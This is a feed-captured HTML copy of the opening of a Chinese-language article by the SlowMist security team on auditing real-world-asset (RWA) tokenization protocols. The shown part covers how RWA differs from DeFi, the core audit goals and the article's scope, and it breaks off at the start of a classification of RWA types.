<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=ff33a696&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU4ODQ3NTM2OA%3D%3D%26mid%3D2247504881%26idx%3D1%26sn%3D8c83bc9f82e684fdb75e04fade95913f">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 06 May 2026 19:04:00 +0800</pubDate>
    </item>
    <item>
      <title>慢雾出品｜链接真实世界资产：从协议族解析到安全实践</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504861&amp;idx=1&amp;sn=0f71a6b7fafe17ee9cd5e6cf07b83e41</link>
      <description>本文从安全审计视角探讨 RWA ，旨在帮助开发者在写 RWA 协议时针对性开发，并为审计人员提供一套专门针对现实世界资产映射场景的系统方法。</description>
      <content:encoded><![CDATA[<p>原创 <span>慢雾安全团队</span> <span>2026-04-30 10:52</span> <span style="display: inline-block;">中国香港</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=8e939a62&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F8z8bibAexaCJZbAvRvpRCpo8cn0qosqj8HCVOH3zghpL4J3EGlgVCkPaxdplInjpDYOuwRThsUicOTOKXDaObtUCSAULaomy6MDVCNANl2jI4%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>本文从安全审计视角探讨 RWA ，旨在帮助开发者在写 RWA 协议时针对性开发，并为审计人员提供一套专门针对现实世界资产映射场景的系统方法。</p>
  <p><b data-pm-slice="0 0 []"><p data-start="27" data-end="169" data-pm-slice="0 0 []" style="margin-top: 0px;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">RWA（Real World Asset，现实世界资产）正在成为 Web3 与传统金融深度融合的重要方向。相比传统 DeFi，RWA 协议不仅承载链上资产流转，更直接映射债券、股权、房地产、设备、收益权等现实世界资产，其安全边界也从“代码安全”延伸至“权利确权、合规治理与链下执行”。</span></span></p><p data-start="171" data-end="268" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">从审计视角来看，RWA 的核心挑战不再只是防止资金被盗，而是如何确保代码逻辑、业务规则与现实法律权益保持一致：一次权限变更，可能对应的是资产冻结；一次强制转账，可能影响的是真实世界中的债权归属。</span></span></p><p data-start="270" data-end="352" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="color: rgb(255, 0, 0);font-weight: normal;">本文将从协议族分类、标准实现到安全审计实践，系统梳理 RWA 协议的核心模块、常见风险与审计重点，帮助开发者和审计人员快速建立一套面向现实世界资产映射的安全方法论。</span></span></p><p data-start="354" data-end="460" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 16px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="color: rgb(255, 0, 0);font-weight: normal;">考虑到篇幅限制，</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="color: rgb(255, 0, 0);font-weight: normal;">本文将优先展示核心框架、关键模块与重点结论</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="color: rgb(255, 0, 0);font-weight: normal;">，如希望系统查看完整内容，可前往 GitHub：</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="color: rgb(255, 0, 0);font-weight: normal;"><a href="https://github.com/slowmist/RWA-Security-Practices" target="_blank">https://github.com/slowmist/RWA-Security-Practices</a> 或</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="color: rgb(255, 0, 0);font-weight: normal;">点击文末“阅读原文”获取。</span></span></p><h2 dir="ltr" style="margin-top: 0px;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">一、前言：从代码审计视角看 RWA</span></span></h2><h3 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">1.1 RWA 协议引入的复合安全维度与审计挑战</span></span></h3><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">从代码审计的角度看，RWA 协议相较于普通 DeFi 最大的区别有三点。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">第一，资产本质不同：代码只是一层“映射”。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">第二，权限与角色更加密集和敏感。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">第三，业务流程穿插链上与链下。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在传统 DeFi 中，一笔交易的生命周期基本被合约完全覆盖：从调用、计算到状态更新都在链上完成。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">而在 RWA 中，常见的是这种路径：</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">用户在链上调用 redeem() 或 forcedTransfer() → 合约更新状态并记录事件 → 链下系统收到通知，执行真实资产交割、过户或清算 → 结果再通过某种方式反馈回来（或保持在链下）</span></span></p><h3 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">1.2 RWA 审计的核心使命</span></span></h3><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在一个典型 RWA 项目里，安全审计的目标不再只是“防止资金被黑客直接盗走”，它至少要守住三条</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">底线：</span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p dir="ltr" style="margin-top:12pt;text-indent:0px;line-height:25.6px;margin-bottom:0px;text-align:left;" role="presentation"><span style="text-indent: 0px;line-height: 25.6px;white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">正确性与安全性：代码本身不能出错。</span></span></span></p></li><li><p dir="ltr" style="margin-top:12pt;text-indent:0px;line-height:25.6px;margin-bottom:0px;text-align:left;" role="presentation"><span style="text-indent: 0px;line-height: 25.6px;white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">一</span></span></span><span style="text-indent: 0px;line-height: 25.6px;white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">致性：代码行为要与项目声明的规则相符。</span></span></span></p></li><li><p dir="ltr" style="margin-top:12pt;text-indent:0px;line-height:25.6px;margin-bottom:0px;text-align:left;" role="presentation"><span style="text-indent: 0px;line-height: 25.6px;white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">可审计性：未来出现问题时，链上证据要能说得清。</span></span></span></p></li></ul><p><b data-pm-slice="0 0 []"><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:null},&#34;namespaceURI&#34;:&#34;&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:null,&#34;id&#34;:&#34;docs-internal-guid-7394a90c-7fff-a284-0716-7ff8a839ff92&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;list&#34;,{&#34;type&#34;:&#34;ol&#34;,&#34;style&#34;:&#34;list-style-type: decimal&#34;,&#34;class&#34;:&#34;list-paddingleft-1&#34;,&#34;start&#34;:null},&#34;listitem&#34;,{&#34;style&#34;:null},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;dir&#34;:&#34;ltr&#34;,&#34;style&#34;:&#34;margin-top: 12pt; text-indent: 0px; line-height: 25.6px; margin-bottom: 0px; text-align: left;&#34;,&#34;role&#34;:&#34;presentation&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:null},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-size: 20px;font-weight: bold;">1.3 本文的视角与边界</span></span></p></b></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这篇文章我们从安全审计的视角来谈 RWA。</span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p dir="ltr" style="margin-top:12pt;text-indent:0px;line-height:25.6px;margin-bottom:0px;text-align:left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">对开发者来说，可以把这篇文章当作一份“从审计倒推回来的设计说明”</span></span></p></li></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">对审计人员来说，可以把它当作“RWA 审计指南 + checklist”</span></span></p></li></ul><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">同时在已有“智能合约审计”经验的基础上，加一层关于 RWA 协议结构和审计重点的专门知识。</span></span></p><ul class="list-paddingleft-1"></ul><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">目标是让开发者在写 RWA 协议时针对性开发，让审计人员在面对 RWA 项目时不再只是局限于链上部分，而是有一套专门针对现实世界资产映射场景的系统方法。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这篇文章不会试图做几件事：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">不会详细讨论各国监管条文或判例，只会在需要时提到“这类约束的存在”；</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">不会从零讲解 Solidity 或基础 ERC 标准，默认读者已具备一般 DeFi/NFT 审计经验；</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">不会从 Tokenomics 角度评价某个项目是否“好项目”，只关心代码与它声称的 RWA 模型是否安全、可靠、一致。</span></span></p></li></ul><h2 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">二、RWA 协议与代码模块速览</span></span></h2><h3 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">2.1 从业务出发：先判断是哪一类 RWA</span></span></h3><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">从安全审计的业务角度出发，我们可以先把项目粗略归到下面四类中：</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">1. 证券 / 股权 / 债券型 RWA</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, 